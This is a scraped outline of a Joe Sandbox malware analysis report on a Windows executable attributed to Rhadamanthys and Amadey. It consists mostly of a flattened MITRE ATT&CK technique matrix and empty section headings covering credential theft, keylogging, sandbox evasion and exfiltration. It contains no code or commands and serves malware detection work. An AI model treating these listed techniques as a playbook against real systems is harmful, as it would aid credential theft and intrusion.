Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	711 Process Injection	31 Obfuscated Files or Information	Security Account Manager	23 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Scheduled Task/Job	Login Hook	2 Scheduled Task/Job	1 Software Packing	NTDS	257 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Extra Window Memory Injection	Cached Domain Credentials	761 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	261 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	261 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	711 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9ua5N7dcBZ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Rhadamanthys

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
9ua5N7dcBZ.exe